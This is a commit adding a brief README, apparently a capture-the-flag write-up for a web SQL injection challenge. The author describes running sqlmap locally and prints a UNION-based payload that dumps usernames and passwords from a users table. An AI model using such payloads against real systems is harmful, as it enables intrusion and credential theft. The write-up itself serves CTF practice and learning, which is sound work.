Skip to content

Commit 401ce2f

Browse files
authored
README.md
1 parent 78a9530 commit 401ce2f

File tree

1 file changed

+7
-0
lines changed

1 file changed

+7
-0
lines changed

Web/README.md

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,8 @@
1+
Looking at the name of the challeneg we already know it's sqlijection challenege. So what i did was spwan a local stance of the we g the source code given. Then i used sqlmap against to obtain the payload used to dump the database.
2+
3+
Payload
4+
5+
```
6+
-4113" UNION ALL SELECT CHAR(113,113,98,107,113)||JSON_GROUP_ARRAY(COALESCE(name,CHAR(32))||CHAR(97,113,101,111,111,109)||COALESCE(password,CHAR(32)))||CHAR(113,122,120,112,113) FROM users-- ZsWA
7+
```
18

0 commit comments

Comments
 (0)